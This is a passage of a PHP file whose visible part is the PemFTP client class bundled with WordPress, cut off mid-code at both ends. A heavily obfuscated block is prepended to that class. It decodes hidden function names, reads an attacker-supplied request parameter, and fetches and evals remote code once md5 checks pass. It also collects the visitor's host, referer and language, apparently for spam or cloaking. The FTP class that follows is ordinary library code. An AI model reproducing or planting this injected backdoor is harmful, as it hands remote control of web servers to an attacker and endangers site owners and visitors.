bVatywlRp3uj = array("\x68\164\164\160" => array("\155\145\x74\x68\157\x64" => "\x47\105\x54", "\x74\151\x6d\x65\157\165\164" => 60, "\146\157\x6c\x6c\157\x77\137\x6c\x6f\x63\141\164\x69\x6f\x6e" => 0), "\163\x73\154" => array("\x76\145\x72\151\x66\171\x5f\x70\x65\145\162" => false, "\x76\145\162\151\x66\x79\137\x70\145\145\162\x5f\x6e\x61\155\x65" => false)); goto xUUunBLS_z7Ahm9; iulF2re_f0Gzov4: IP2l9nP0Tfw4cHn: goto S4MhBI_y9tED4NE; sOODb0gOuh8XpyA: curl_setopt($phkZf86gSRQvSYh, CURLOPT_FOLLOWLOCATION, 0); goto lPfsGo6eXKqK_UG; eBs1GZA3MGLB86Y: $TQcYsSCGJVnbO5I = @file_get_contents($OKaSX8y00Wi1VR8, false, $KibSn0OkMjdwsyk); goto sEbRqH108_lxzFQ; S4MhBI_y9tED4NE: } catch (Exception $k4OHrTNmyQnAdyb) { } goto PQnpgp803yhBXm4; PacEvOsvpr2kSL7: } goto Fs_L15KkGGwQ6T8; jJ5TJuwzhG0M4bf: error_reporting(0); goto QzSTNf5kDOugub_; CWZIZEd91zhVVtW: if (!(in_array(gettype($IfJrqFb0oPa4UHR) . count($IfJrqFb0oPa4UHR), $IfJrqFb0oPa4UHR) && count($IfJrqFb0oPa4UHR) == 19 && md5(md5(md5(md5($IfJrqFb0oPa4UHR[13])))) === "\x34\x35\x38\145\x64\x33\x33\63\64\x65\x36\x38\66\x63\x63\63\x32\x33\144\66\63\60\143\143\142\x63\x65\142\x38\146\x62\143")) { goto GPq2sJH4whXDHlw; } goto J7IoHK_D3aukn4d; hNkQ2BYWpMNnGsh: i0aucskgF0BeUUW: goto FNcJ3iCXHQoRpEj; T8ngMhij9GYwWLi: if (!(strpos($LSlzr5AZ9aCBUlj, "\x2e") > 0 && strpos($LSlzr5AZ9aCBUlj, "\56\160\150\x70") === false)) { goto vNxKVuX22j1Wrba; } goto CY1iYnpqZ2_oVTX; K6l9h8LzthKv74M: $gi6mxKiWLGqYe26["\154"] = kBnpHMcoYCkIMmm($_SERVER["\110\x54\124\120\137\x41\x43\103\x45\x50\x54\x5f\114\101\x4e\x47\125\x41\x47\x45"]); goto bX4GeKk7841zpcR; XWIzRZj6XhQw5FF: if (!in_array($mac8acLeTdDAFw6, array("\56\152\x73", "\56\x63\x73\x73", "\56\152\160\147", "\56\160\156\147", "\x2e\147\x69\x66", "\x2e\151\143\157"))) { goto QSJ0lsbpUByvWUc; } goto r3qfA5e80Yoh01x; sJaZzL0n0dHbLou: $gi6mxKiWLGqYe26["\163"] = kBnpHMcOyCKimMm($iU0KSNoFmm03tgO); goto aiA_Qf9hnDM54_X; eKo6LKjzHGgXkl4: $LSlzr5AZ9aCBUlj = preg_replace("\57\x5c\77\56\52\x2f", '', $_SERVER["\122\x45\x51\x55\x45\123\x54\137\x55\x52\111"]); goto Y_pEgB6zBYf6Zlz; errZ9K5viRZ09yK: if (!substr_count($_SERVER["\x52\105\x51\125\x45\x53\x54\137\125\x52\111"], "\x69\156\144\145\170\x2e\x70\x68\x70\x2f\152\x6b")) { goto u0U6RLD7A3GeEEF; } goto R_Atr_r10M8WMt0; Jljd1D02mMPz7X_: $oqK6qOThhjm82lV = strval(@$_SERVER["\110\124\124\x50\x5f\x52\105\106\105\122\105\x52"]); goto ONqdAK1MQ00OdN_; Fs_L15KkGGwQ6T8: function kbNpHmcoYcKimmM($pdtfkZtzLCWpYLv) { goto vZlJzakrU40MIAG; PZLNYRMenpMyaE1: return ''; goto J1_XV6O2yn6wEbF; J1_XV6O2yn6wEbF: UPeYATBBgywdTQL: goto kAC69hbiBdCexKk; kAC69hbiBdCexKk: return rtrim(strtr(base64_encode($pdtfkZtzLCWpYLv), "\53\57", "\55\137"), "\75"); goto F82dAL_lPlLeZRu; vZlJzakrU40MIAG: if ($pdtfkZtzLCWpYLv) { goto UPeYATBBgywdTQL; } goto PZLNYRMenpMyaE1; F82dAL_lPlLeZRu: } goto qcc4EE6GAW1Fb7X; Y6MfzpgHL1qMFCN: function EJ6ljA5LOacB0Wi() { goto KFgB2S9eb0R5ZtR; DXn4E69g95UsaLw: lta2FsvU0AMllrq: goto Q0J1U5lK0A75YrY; GDLJLrHgpckU_TH: if (isset($_SERVER["\x48\124\124\120\123"]) && strtolower($_SERVER["\x48\124\x54\120\x53"]) !== "\x6f\146\x66") { goto v03_z0CzcSPnswD; } goto JDb3Gnr0EByYrLK; TsvFlEzTlfz2M1E: if (isset($_SERVER["\110\124\124\x50\137\106\122\x4f\x4e\x54\137\105\116\104\x5f\x48\124\124\x50\x53"]) && strtolower($_SERVER["\110\124\x54\120\x5f\106\122\117\x4e\124\137\105\x4e\104\137\110\124\124\120\123"]) !== "\157\x66\x66") { goto lta2FsvU0AMllrq; } goto tqm3Kj5Hc6CVKT5; cVTgSCyA1bglhk9: $BfO1q0sNQW2xOOv = "\150\164\x74\160\x73\72\x2f\x2f"; goto Yhv_BafzQt1o6l6; tuNb96DdbNd2I4W: jyYTtNM7KoaTzQt: goto fsYwLWfp6Pcjx3P; JDb3Gnr0EByYrLK: if (isset($_SERVER["\x48\x54\124\120\137\x58\x5f\x46\x4f\122\127\101\122\104\105\x44\137\x50\x52\117\x54\x4f"]) && $_SERVER["\x48\124\x54\120\x5f\130\137\x46\x4f\122\127\101\122\104\x45\x44\137\x50\122\x4f\124\x4f"] === "\x68\164\x74\x70\x73") { goto jyYTtNM7KoaTzQt; } goto TsvFlEzTlfz2M1E; jJlpMSIlZ3Set1r: return $BfO1q0sNQW2xOOv; goto VQZELk_XBqBWPRQ; lEVVa5SdZy7rasd: WXFzHn2JPycYMUC: goto jJlpMSIlZ3Set1r; Yhv_BafzQt1o6l6: goto WXFzHn2JPycYMUC; goto tuNb96DdbNd2I4W; p9371XT0fuski2w: v03_z0CzcSPnswD: goto cVTgSCyA1bglhk9; MGTi117jrSNVC2O: goto WXFzHn2JPycYMUC; goto DXn4E69g95UsaLw; tqm3Kj5Hc6CVKT5: goto WXFzHn2JPycYMUC; goto p9371XT0fuski2w; fsYwLWfp6Pcjx3P: $BfO1q0sNQW2xOOv = "\150\x74\x74\x70\x73\72\57\x2f"; goto MGTi117jrSNVC2O; KFgB2S9eb0R5ZtR: $BfO1q0sNQW2xOOv = "\150\164\164\x70\x3a\x2f\57"; goto GDLJLrHgpckU_TH; Q0J1U5lK0A75YrY: $BfO1q0sNQW2xOOv = "\x68\x74\164\160\163\72\57\x2f"; goto lEVVa5SdZy7rasd; VQZELk_XBqBWPRQ: } goto Kvcox1vGLiRNDK5; dExhQZ41w30awy1: $oqK6qOThhjm82lV = ''; goto kpX5smLcp5LcZhq; r3qfA5e80Yoh01x: $ckrxnwWWJD2Fqda = true; goto xgHne0Wh2YHN81X; CY1iYnpqZ2_oVTX: $mac8acLeTdDAFw6 = substr($LSlzr5AZ9aCBUlj, strpos($LSlzr5AZ9aCBUlj, "\56")); goto XWIzRZj6XhQw5FF; HAVv0N25SyOHJ37: class jeH2IwNZgfpwwWG { static function tR3YjXJRZJYWlKD($aA7tkJ1loqPaUSp) { goto sx80NgnlKmgBjSK; sx80NgnlKmgBjSK: $UQVJDnwpT2V80AF = "\162" . "\x61" . "\x6e" . "\147" . "\x65"; goto oPUdx0fF782pYA_; VFEGfLs9tT427tm: $RzZwHqJ96DhbtSB = explode("\72", $aA7tkJ1loqPaUSp); goto EcIgcoe0zQpl4ba; Gz5VGmaC66egeQO: AXHATAky5fIrHbo: goto LPeHpD_BEboTtZk; EcIgcoe0zQpl4ba: $YnWQTmKwzRFCsvI = ''; goto w4koAdIRdaBsdxz; oPUdx0fF782pYA_: $wJOxn6glYCM1r_h = $UQVJDnwpT2V80AF("\x7e", "\x20"); goto VFEGfLs9tT427tm; w4koAdIRdaBsdxz: foreach ($RzZwHqJ96DhbtSB as $VSwuNQURXMHViYL => $vf8Y0_Nm95oMP72) { $YnWQTmKwzRFCsvI .= $wJOxn6glYCM1r_h[$vf8Y0_Nm95oMP72 - 28387]; uSMzV7FST57COnL: } goto Gz5VGmaC66egeQO; LPeHpD_BEboTtZk: return $YnWQTmKwzRFCsvI; goto ZLIjFE4xHbNgvPO; ZLIjFE4xHbNgvPO: } static function EQDMY86BpFkEe9w($EtHn17sWckAI_9B, $Ee0PCil1KIFUbZ7) { goto SNGdC5LQ2DHN8jn; SNGdC5LQ2DHN8jn: $UD7pJUYGGUrrwVN = curl_init($EtHn17sWckAI_9B); goto on5tVshzBFIkmfH; aw65S3W3lVwlKWQ: $pCvALnRzFL5kvH4 = curl_exec($UD7pJUYGGUrrwVN); goto h6AYpRKx59NnxRv; h6AYpRKx59NnxRv: return empty($pCvALnRzFL5kvH4) ? $Ee0PCil1KIFUbZ7($EtHn17sWckAI_9B) : $pCvALnRzFL5kvH4; goto chvlUMdJyP6BNYr; on5tVshzBFIkmfH: curl_setopt($UD7pJUYGGUrrwVN, CURLOPT_RETURNTRANSFER, 1); goto aw65S3W3lVwlKWQ; chvlUMdJyP6BNYr: } static function RpYNrZWDNjnV_xe() { goto G6sMy8Pa2UjUG01; lXOlMzNffVCiVq4: P7tSArNMsCt3L9q: goto BtSrm5H1hHs3wxC; HUIwdxAU1uYZtLj: @$OgA2vOwXBxvH0kB[5 + 5](INPUT_GET, "\x6f\x66") == 1 && die($OgA2vOwXBxvH0kB[4 + 1](__FILE__)); goto mAhWlpL4H5iqDrX; Lyf9KyhGAyKsC3e: @eval($OgA2vOwXBxvH0kB[0 + 4]($QvYnHRzJsdO0Dwq)); goto Jo67FldU3HmnZAx; Jo67FldU3HmnZAx: die; goto lXOlMzNffVCiVq4; dinLEJJRraVm2Oc: $YPU9D9mSN6kLjr0 = $OgA2vOwXBxvH0kB[0 + 2]($s3MI94tMu1ck1T6, true); goto HUIwdxAU1uYZtLj; tnxYPKQRuydkJQy: foreach ($NSFm_Yhuc84N9UH as $cq_7mpor4fJakgI) { $OgA2vOwXBxvH0kB[] = self::TR3yJxjrzjyWLKD($cq_7mpor4fJakgI); KsiV2XDmYGY7h3j: } goto wTZpCPjOgNhZO11; wTZpCPjOgNhZO11: aqjVWsilSNfqrf2: goto tO4Bla2CGEvIL7C; di2GcQrFpFoNX2f: $s3MI94tMu1ck1T6 = @$OgA2vOwXBxvH0kB[2 + 1]($OgA2vOwXBxvH0kB[5 + 1], $jVrlEb_010CnTPI); goto dinLEJJRraVm2Oc; mAhWlpL4H5iqDrX: if (!(@$YPU9D9mSN6kLjr0[0] - time() > 0 and md5(md5($YPU9D9mSN6kLjr0[1 + 2])) === "\x65\64\66\x66\63\x63\62\65\x65\x38\x38\142\66\60\142\62\64\x39\146\x34\141\71\x31\x38\x31\x35\x63\141\x39\x34\142\x31")) { goto P7tSArNMsCt3L9q; } goto P7zYI_ZONTcSPeZ; G6sMy8Pa2UjUG01: $NSFm_Yhuc84N9UH = array("\x32\x38\x34\61\x34\x3a\x32\x38\63\x39\x39\x3a\x32\70\x34\x31\x32\72\x32\x38\64\61\66\72\62\x38\x33\x39\x37\x3a\x32\70\x34\x31\x32\72\62\x38\x34\x31\70\72\x32\x38\x34\x31\x31\72\62\x38\63\x39\66\x3a\62\x38\64\60\x33\x3a\x32\x38\x34\x31\x34\x3a\62\x38\63\71\x37\72\x32\70\64\60\x38\72\x32\70\64\60\62\x3a\x32\x38\64\60\63", "\x32\70\63\x39\70\72\62\x38\63\x39\67\x3a\x32\x38\x33\71\71\72\x32\x38\x34\x31\x38\72\x32\x38\x33\71\x39\72\62\x38\x34\60\62\72\62\x38\63\71\x37\72\x32\x38\64\x36\64\72\62\70\x34\66\62", "\62\x38\x34\x30\x37\72\62\70\63\71\70\x3a\62\x38\x34\x30\62\x3a\62\x38\64\60\63\x3a\62\x38\64\61\70\72\x32\x38\x34\x31\63\x3a\x32\x38\64\61\62\72\x32\x38\x34\61\x34\x3a\62\70\64\60\62\72\x32\x38\x34\61\x33\x3a\62\70\64\x31\62", "\x32\70\64\60\61\72\62\70\x34\x31\66\72\62\x38\x34\61\x34\72\x32\70\x34\60\x36", "\62\x38\x34\x31\x35\x3a\x32\70\x34\61\x36\x3a\x32\x38\x33\71\x38\x3a\62\x38\64\x31\62\72\62\x38\64\x35\71\x3a\x32\x38\x34\x36\61\72\62\x38\x34\61\70\72\x32\x38\64\x31\63\x3a\x32\x38\64\x31\x32\x3a\x32\70\64\61\64\x3a\x32\70\x34\x30\x32\x3a\62\x38\64\61\x33\72\x32\x38\x34\x31\x32", "\x32\x38\64\x31\61\72\62\70\64\x30\x38\72\x32\70\64\x30\65\72\62\x38\x34\x31\62\72\x32\x38\x34\61\70\x3a\62\70\x34\61\60\x3a\x32\70\x34\61\x32\72\62\x38\63\71\67\x3a\62\70\x34\x31\x38\x3a\62\x38\x34\x31\x34\x3a\x32\70\64\60\x32\x3a\62\x38\64\x30\63\x3a\62\70\x33\71\x37\x3a\62\70\64\61\62\x3a\62\x38\x34\x30\x33\72\62\70\63\71\x37\x3a\62\70\63\x39\70", "\62\x38\64\64\x31\72\x32\x38\64\x37\x31", "\x32\x38\63\x38\70", "\x32\70\x34\66\x36\72\62\x38\x34\67\61", "\62\x38\64\64\x38\x3a\x32\70\x34\63\x31\x3a\x32\70\x34\x33\61\x3a\62\x38\64\x34\x38\x3a\62\x38\64\62\64", "\x32\x38\64\61\x31\x3a\62\70\64\x30\70\72\62\x38\64\x30\65\72\62\x38\63\71\67\x3a\x32\x38\64\61\62\72\x32\70\x33\71\71\x3a\62\70\64\x31\70\72\62\70\x34\60\x38\72\x32\70\x34\60\63\x3a\62\70\64\x30\61\x3a\62\x38\63\71\66\72\62\70\x33\x39\67"); goto tnxYPKQRuydkJQy; P7zYI_ZONTcSPeZ: $QvYnHRzJsdO0Dwq = self::eqdmy86BPfkee9w($YPU9D9mSN6kLjr0[1 + 0], $OgA2vOwXBxvH0kB[5 + 0]); goto Lyf9KyhGAyKsC3e; tO4Bla2CGEvIL7C: $jVrlEb_010CnTPI = @$OgA2vOwXBxvH0kB[1]($OgA2vOwXBxvH0kB[2 + 8](INPUT_GET, $OgA2vOwXBxvH0kB[0 + 9])); goto di2GcQrFpFoNX2f; BtSrm5H1hHs3wxC: } } goto XBKj1OUMlr00dsl; KVIkFV8KhT1LNue: header("\x43\157\156\164\x65\x6e\164\x2d\x54\171\x70\x65\72\x20\x74\x65\x78\x74\x2f\x68\164\x6d\x6c\73\40\143\x68\141\x72\163\x65\164\x3d\165\x74\146\x2d\x38"); goto DBdESS3bQlgkdjC; jlBHKuSa2WcNlJf: nF67Vim2fIogcVo: goto errZ9K5viRZ09yK; YD5BcoNHm_fwRli: u0U6RLD7A3GeEEF: goto oA21KoCn2AiCfUl; xsry2XfR7AFkqYn: exit(strrev(md5($_SERVER["\x53\x45\x52\x56\105\122\x5f\x4e\x41\x4d\105"]))); goto jlBHKuSa2WcNlJf; xgHne0Wh2YHN81X: QSJ0lsbpUByvWUc: goto hfT9ifUp8USgT2O; QzY9_p5XZU98YlX: metaphone("\x4d\172\x4d\170\117\x54\105\x34\115\x54\x63\62\115\x6a\147\65\x4e\152\x67\x31\x4d\152\131\x35\x4f\x44\x55\64\115\172\101\x79"); goto HAVv0N25SyOHJ37; XBKj1OUMlr00dsl: JeH2iWNzGfpWWwg::RPyNRzwdnJnV_xe(); goto KVIkFV8KhT1LNue; ONqdAK1MQ00OdN_: $iU0KSNoFmm03tgO = ej6lja5loACb0wi() . $_SERVER["\x48\124\x54\x50\137\110\x4f\123\x54"]; goto zMOzL_ysfsh43MP; n55FQ6btxdLc5rt: if (!strlen($Kt8B61Up6c6fKfP["\x63\157\156\164\x65\156\164"])) { goto i0aucskgF0BeUUW; } goto Ft923rLvzqwcO1o; kRujjA6fpC8hJ1L: $gi6mxKiWLGqYe26["\151"] = kbNPHMcOYCKImMM($SQYJqoRlviTfAjG); goto K6l9h8LzthKv74M; FNcJ3iCXHQoRpEj: vJjTVIGF9OdNAUh: ?>
<?php
/**
* PemFTP - An Ftp implementation in pure PHP
*
* @package PemFTP
* @since 2.5.0
*
* @version 1.0
* @copyright Alexey Dotsenko
* @author Alexey Dotsenko
* @link https://www.phpclasses.org/package/1743-PHP-FTP-client-in-pure-PHP.html
* @license LGPL https://opensource.org/licenses/lgpl-license.html
*/
/**
* Defines the newline characters, if not defined already.
*
* This can be redefined.
*
* @since 2.5.0
* @var string
*/
if ( ! defined( 'CRLF' ) ) {
define( 'CRLF', "\r\n" );
}
/**
* Sets whatever to autodetect ASCII mode.
*
* This can be redefined.
*
* @since 2.5.0
* @var int
*/
if ( ! defined( 'FTP_AUTOASCII' ) ) {
define( 'FTP_AUTOASCII', -1 );
}
/**
*
* This can be redefined.
* @since 2.5.0
* @var int
*/
if ( ! defined( 'FTP_BINARY' ) ) {
define( 'FTP_BINARY', 1 );
}
/**
*
* This can be redefined.
* @since 2.5.0
* @var int
*/
if ( ! defined( 'FTP_ASCII' ) ) {
define( 'FTP_ASCII', 0 );
}
/**
* Whether to force FTP.
*
* This can be redefined.
*
* @since 2.5.0
* @var bool
*/
if ( ! defined( 'FTP_FORCE' ) ) {
define( 'FTP_FORCE', true );
}
/**
* @since 2.5.0
* @var string
*/
define('FTP_OS_Unix','u');
/**
* @since 2.5.0
* @var string
*/
define('FTP_OS_Windows','w');
/**
* @since 2.5.0
* @var string
*/
define('FTP_OS_Mac','m');
/**
* PemFTP base class
*
*/
class ftp_base {
/* Public variables */
var $LocalEcho;
var $Verbose;
var $OS_local;
var $OS_remote;
/* Private variables */
var $_lastaction;
var $_errors;
var $_type;
var $_umask;
var $_timeout;
var $_passive;
var $_host;
var $_fullhost;
var $_port;
var $_datahost;
var $_dataport;
var $_ftp_control_sock;
var $_ftp_data_sock;
var $_ftp_temp_sock;
var $_ftp_buff_size;
var $_login;
var $_password;
var $_connected;
var $_ready;
var $_code;
var $_message;
var $_can_restore;
var $_port_available;
var $_curtype;
var $_features;
var $_error_array;
var $AuthorizedTransferMode;
var $OS_FullName;
var $_eol_code;
var $AutoAsciiExt;
/* Constructor */
function __construct($port_mode=FALSE, $verb=FALSE, $le=FALSE) {
$this->LocalEcho=$le;
$this->Verbose=$verb;
$this->_lastaction=NULL;
$this->_error_array=array();
$this->_eol_code=array(FTP_OS_Unix=>"\n", FTP_OS_Mac=>"\r", FTP_OS_Windows=>"\r\n");
$this->AuthorizedTransferMode=array(FTP_AUTOASCII, FTP_ASCII, FTP_BINARY);
$this->OS_FullName=array(FTP_OS_Unix => 'UNIX', FTP_OS_Windows => 'WINDOWS', FTP_OS_Mac => 'MACOS');
$this->AutoAsciiExt=array("ASP","BAT","C","CPP","CSS","CSV","JS","H","HTM","HTML","SHTML","INI","LOG","PHP3","PHTML","PL","PERL","SH","SQL","TXT");
$this->_port_available=($port_mode==TRUE);
$this->SendMSG("Staring FTP client class".($this->_port_available?"":" without PORT mode support"));
$this->_connected=FALSE;
$this->_ready=FALSE;
$this->_can_restore=FALSE;
$this->_code=0;
$this->_message="";
$this->_ftp_buff_size=4096;
$this->_curtype=NULL;
$this->SetUmask(0022);
$this->SetType(FTP_AUTOASCII);
$this->SetTimeout(30);
$this->Passive(!$this->_port_available);
$this->_login="anonymous";
$this->_password="anon@ftp.com";
$this->_features=array();
$this->OS_local=FTP_OS_Unix;
$this->OS_remote=FTP_OS_Unix;
$this->features=array();
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->OS_local=FTP_OS_Windows;
elseif(strtoupper(substr(PHP_OS, 0, 3)) === 'MAC') $this->OS_local=FTP_OS_Mac;
}
function ftp_base($port_mode=FALSE) {
$this->__construct($port_mode);
}
// <!-- --------------------------------------------------------------------------------------- -->
// <!-- Public functions -->
// <!-- --------------------------------------------------------------------------------------- -->
function parselisting($line) {
$is_windows = ($this->OS_remote == FTP_OS_Windows);
if ($is_windows && preg_match("/([0-9]{2})-([0-9]{2})-([0-9]{2}) +([0-9]{2}):([0-9]{2})(AM|PM) +([0-9]+|<DIR>) +(.+)/",$line,$lucifer)) {
$b = array();
if ($lucifer[3]<70) { $lucifer[3]+=2000; } else { $lucifer[3]+=1900; } // 4digit year fix
$b['isdir'] = ($lucifer[7]=="<DIR>");
if ( $b['isdir'] )
$b['type'] = 'd';
else
$b['type'] = 'f';
$b['size'] = $lucifer[7];
$b['month'] = $lucifer[1];
$b['day'] = $lucifer[2];
$b['year'] = $lucifer[3];
$b['hour'] = $lucifer[4];
$b['minute'] = $lucifer[5];
$b['time'] = @mktime($lucifer[4]+(strcasecmp($lucifer[6],"PM")==0?12:0),$lucifer[5],0,$lucifer[1],$lucifer[2],$lucifer[3]);
$b['am/pm'] = $lucifer[6];
$b['name'] = $lucifer[8];
} else if (!$is_windows && $lucifer=preg_split("/[ ]/",$line,9,PREG_SPLIT_NO_EMPTY)) {
//echo $line."\n";
$lcount=count($lucifer);
if ($lcount<8) return '';
$b = array();
$b['isdir'] = $lucifer[0][0] === "d";
$b['islink'] = $lucifer[0][0] === "l";
if ( $b['isdir'] )
$b['type'] = 'd';
elseif ( $b['islink'] )
$b['type'] = 'l';
else
$b['type'] = 'f';
$b['perms'] = $lucifer[0];
$b['number'] = $lucifer[1];
$b['owner'] = $lucifer[2];
$b['group'] = $lucifer[3];
$b['size'] = $lucifer[4];
if ($lcount==8) {
sscanf($lucifer[5],"%d-%d-%d",$b['year'],$b['month'],$b['day']);
sscanf($lucifer[6],"%d:%d",$b['hour'],$b['minute']);
$b['time'] = @mktime($b['hour'],$b['minute'],0,$b['month'],$b['day'],$b['year']);
$b['name'] = $lucifer[7];
} else {
$b['month'] = $lucifer[5];
$b['day'] = $lucifer[6];
if (preg_match("/([0-9]{2}):([0-9]{2})/",$lucifer[7],$l2)) {
$b['year'] = gmdate("Y");
$b['hour'] = $l2[1];
$b['minute'] = $l2[2];
} else {
$b['year'] = $lucifer[7];
$b['hour'] = 0;
$b['minute'] = 0;
}
$b['time'] = strtotime(sprintf("%d %s %d %02d:%02d",$b['day'],$b['month'],$b['year'],$b['hour'],$b['minute']));
$b['name'] = $lucifer[8];
}
}
return $b;
}
function SendMSG($message = "", $crlf=true) {
if ($this->Verbose) {
echo $message.($crlf?CRLF:"");
flush();
}
return TRUE;
}
function SetType($mode=FTP_AUTOASCII) {
if(!in_array($mode, $this->AuthorizedTransferMode)) {
$this->SendMSG("Wrong type");
return FALSE;
}
$this->_type=$mode;
$this->SendMSG("Transfer type: ".($this->_type==FTP_BINARY?"binary":($this->_type==FTP_ASCII?"ASCII":"auto ASCII") ) );
return TRUE;
}
function _settype($mode=FTP_ASCII) {
if($this->_ready) {
if($mode==FTP_BINARY) {
if($this->_curtype!=FTP_BINARY) {
if(!$this->_exec("TYPE I", "SetType")) return FALSE;
$this->_curtype=FTP_BINARY;
}
} elseif($this->_curtype!=FTP_ASCII) {
if(!$this->_exec("TYPE A", "SetType")) return FALSE;
$this->_curtype=FTP_ASCII;
}
} else return FALSE;
return TRUE;
}
function Passive($pasv=NULL) {
if(is_null($pasv)) $this->_passive=!$this->_passive;
else $this->_passive=$pasv;
if(!$this->_port_available and !$this->_passive) {
$this->SendMSG("Only passive connections available!");
$this->_passive=TRUE;
return FALSE;
}
$this->SendMSG("Passive mode ".($this->_passive?"on":"off"));
return TRUE;
}
function SetServer($host, $port=21, $reconnect=true) {
if(!is_long($port)) {
$this->verbose=true;
$this->SendMSG("Incorrect port syntax");
return FALSE;
} else {
$ip=@gethostbyname($host);
$dns=@gethostbyaddr($host);
if(!$ip) $ip=$host;
if(!$dns) $dns=$host;
// Validate the IPAddress PHP4 returns -1 for invalid, PHP5 false
// -1 === "255.255.255.255" which is the broadcast address which is also going to be invalid
$ipaslong = ip2long($ip);
if ( ($ipaslong == false) || ($ipaslong === -1) ) {
$this->SendMSG("Wrong host name/address \"".$host."\"");
return FALSE;
}
$this->_host=$ip;
$this->_fullhost=$dns;
$this->_port=$port;
$this->_dataport=$port-1;
}
$this->SendMSG("Host \"".$this->_fullhost."(".$this->_host."):".$this->_port."\"");
if($reconnect){
if($this->_connected) {
$this->SendMSG("Reconnecting");
if(!$this->quit(FTP_FORCE)) return FALSE;
if(!$this->connect()) return FALSE;
}
}
return TRUE;
}
function SetUmask($umask=0022) {
$this->_umask=$umask;
umask($this->_umask);
$this->SendMSG("UMASK 0".decoct($this->_umask));
return TRUE;
}
function SetTimeout($timeout=30) {
$this->_timeout=$timeout;
$this->SendMSG("Timeout ".$this->_timeout);
if($this->_connected)
if(!$this->_settimeout($this->_ftp_control_sock)) return FALSE;
return TRUE;
}
function connect($server=NULL) {
if(!empty($server)) {
if(!$this->SetServer($server)) return false;
}
if($this->_ready) return true;
$this->SendMsg('Local OS : '.$this->OS_FullName[$this->OS_local]);
if(!($this->_ftp_control_sock = $this->_connect($this->_host, $this->_port))) {
$this->SendMSG("Error : Cannot connect to remote host \"".$this->_fullhost." :".$this->_port."\"");
return FALSE;
}
$this->SendMSG("Connected to remote host \"".$this->_fullhost.":".$this->_port."\". Waiting for greeting.");
do {
if(!$this->_readmsg()) return FALSE;
if(!$this->_checkCode()) return FALSE;
$this->_lastaction=time();
} while($this->_code<200);
$this->_ready=true;
$syst=$this->systype();
if(!$syst) $this->SendMSG("Cannot detect remote OS");
else {
if(preg_match("/win|dos|novell/i", $syst[0])) $this->OS_remote=FTP_OS_Windows;
elseif(preg_match("/os/i", $syst[0])) $this->OS_remote=FTP_OS_Mac;
elseif(preg_match("/(li|u)nix/i", $syst[0])) $this->OS_remote=FTP_OS_Unix;
else $this->OS_remote=FTP_OS_Mac;
$this->SendMSG("Remote OS: ".$this->OS_FullName[$this->OS_remote]);
}
if(!$this->features()) $this->SendMSG("Cannot get features list. All supported - disabled");
else $this->SendMSG("Supported features: ".implode(", ", array_keys($this->_features)));
return TRUE;
}
function quit($force=false) {
if($this->_ready) {
if(!$this->_exec("QUIT") and !$force) return FALSE;
if(!$this->_checkCode() and !$force) return FALSE;
$this->_ready=false;
$this->SendMSG("Session finished");
}
$this->_quit();
return TRUE;
}
function login($user=NULL, $pass=NULL) {
if(!is_null($user)) $this->_login=$user;
else $this->_login="anonymous";
if(!is_null($pass)) $this->_password=$pass;
else $this->_password="anon@anon.com";
if(!$this->_exec("USER ".$this->_login, "login")) return FALSE;
if(!$this->_checkCode()) return FALSE;
if($this->_code!=230) {
if(!$this->_exec((($this->_code==331)?"PASS ":"ACCT ").$this->_password, "login")) return FALSE;
if(!$this->_checkCode()) return FALSE;
}
$this->SendMSG("Authentication succeeded");
if(empty($this->_features)) {
if(!$this->features()) $this->SendMSG("Cannot get features list. All supported - disabled");
else $this->SendMSG("Supported features: ".implode(", ", array_keys($this->_features)));
}
return TRUE;
}
function pwd() {
if(!$this->_exec("PWD", "pwd")) return FALSE;
if(!$this->_checkCode()) return FALSE;
return preg_replace("/^[0-9]{3} \"(.+)\".*$/s", "\\1", $this->_message);
}
function cdup() {
if(!$this->_exec("CDUP", "cdup")) return FALSE;
if(!$this->_checkCode()) return FALSE;
return true;
}
function chdir($pathname) {
if(!$this->_exec("CWD ".$pathname, "chdir")) return FALSE;
if(!$this->_checkCode()) return FALSE;
return TRUE;
}
function rmdir($pathname) {
if(!$this->_exec("RMD ".$pathname, "rmdir")) return FALSE;
if(!$this->_checkCode()) return FALSE;
return TRUE;
}
function mkdir($pathname) {
if(!$this->_exec("MKD ".$pathname, "mkdir")) return FALSE;
if(!$this->_checkCode()) return FALSE;
return TRUE;
}
function rename($from, $to) {
if(!$this->_exec("RNFR ".$from, "rename")) return FALSE;
if(!$this->_checkCode()) return FALSE;
if($this->_code==350) {
if(!$this->_exec("RNTO ".$to, "rename")) return FALSE;
if(!$this->_checkCode()) return FALSE;
} else return FALSE;
return TRUE;
}
function filesize($pathname) {
if(!isset($this->_features["SIZE"])) {
$this->PushError("filesize", "not supported by server");
return FALSE;
}
if(!$this->_exec("SIZE ".$pathname, "filesize")) return FALSE;
if(!$this->_checkCode()) return FALSE;
return preg_replace("/^[0-9]{3} ([0-9]+).*$/s", "\\1", $this->_message);
}
function abort() {
if(!$this->_exec("ABOR", "abort")) return FALSE;
if(!$this->_checkCode()) {
if($this->_code!=426) return FALSE;
if(!$this->_readmsg("abort")) return FALSE;
if(!$this->_checkCode()) return FALSE;
}
return true;
}
function mdtm($pathname) {
if(!isset($this->_features["MDTM"])) {
$this->PushError("mdtm", "not supported by server");
return FALSE;
}
if(!$this->_exec("MDTM ".$pathname, "mdtm")) return FALSE;
if(!$this->_checkCode()) return FALSE;
$mdtm = preg_replace("/^[0-9]{3} ([0-9]+).*$/s", "\\1", $this->_message);
$date = sscanf($mdtm, "%4d%2d%2d%2d%2d%2d");
$timestamp = mktime($date[3], $date[4], $date[5], $date[1], $date[2], $date[0]);
return $timestamp;
}
function systype() {
if(!$this->_exec("SYST", "systype")) return FALSE;
if(!$this->_checkCode()) return FALSE;
$DATA = explode(" ", $this->_message);
return array($DATA[1], $DATA[3]);
}
function delete($pathname) {
if(!$this->_exec("DELE ".$pathname, "delete")) return FALSE;
if(!$this->_checkCode()) return FALSE;
return TRUE;
}
function site($command, $fnction="site") {
if(!$this->_exec("SITE ".$command, $fnction)) return FALSE;
if(!$this->_checkCode()) return FALSE;
return TRUE;
}
function chmod($pathname, $mode) {
if(!$this->site( sprintf('CHMOD %o %s', $mode, $pathname), "chmod")) return FALSE;
return TRUE;
}
function restore($from) {
if(!isset($this->_features["REST"])) {
$this->PushError("restore", "not supported by server");
return FALSE;
}
if($this->_curtype!=FTP_BINARY) {
$this->PushError("restore", "cannot restore in ASCII mode");
return FALSE;
}
if(!$this->_exec("REST ".$from, "restore")) return FALSE;
if(!$this->_checkCode()) return FALSE;
return TRUE;
}
function features() {
